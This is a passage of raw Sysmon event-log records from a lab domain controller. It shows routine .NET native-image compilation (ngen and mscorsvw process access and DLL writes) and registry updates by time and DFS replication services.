.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.049{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90A0-6005-2E01-00000000A301}4712C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.034{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90A8-6005-3101-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.018{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90A8-6005-3101-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.018{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90A8-6005-3101-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:16.846{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90B0-6005-3401-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:16.830{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90B0-6005-3401-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:16.830{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90B0-6005-3401-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:16.330{59A5CD1D-90A8-6005-3301-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12f4-0\System.dll2021-01-18 13:44:16.330 10341000x80000000000000005335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:17.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90B1-6005-3501-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:17.096{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90B1-6005-3501-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:17.096{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90B1-6005-3501-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:22.783{59A5CD1D-90B1-6005-3501-00000000A301}1240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\4d8-0\System.Xml.dll2021-01-18 13:44:22.783 13241300x80000000000000005336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:22.643{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda0-0x0743a4f0) 10341000x80000000000000005343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:23.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90B7-6005-3701-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:23.205{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90B7-6005-3701-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:23.205{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90B7-6005-3701-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:23.018{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90B7-6005-3601-00000000A301}3532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:23.002{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90B7-6005-3601-00000000A301}3532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:23.002{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90B7-6005-3601-00000000A301}3532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000005346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:28.814{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x80000000000000005345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:28.814{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x80000000000000005344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:28.814{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 13241300x80000000000000005349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:29.814{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x80000000000000005348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:29.814{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Config SourceDWORD (0x00000001) 13241300x80000000000000005347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:44:29.814{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_EFA38DD3-3D8A-4E67-8BAB-AA536DAF0A2B.XML 10341000x80000000000000005353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:30.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90BE-6005-3801-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:30.564{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90BE-6005-3801-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:30.564{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90BE-6005-3801-00000000A301}3376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:30.299{59A5CD1D-90B7-6005-3701-00000000A301}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b7c-0\System.Core.dll2021-01-18 13:44:30.299 10341000x80000000000000005360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:31.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90BF-6005-3A01-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:31.455{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90BF-6005-3A01-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:31.455{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90BF-6005-3A01-00000000A301}920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\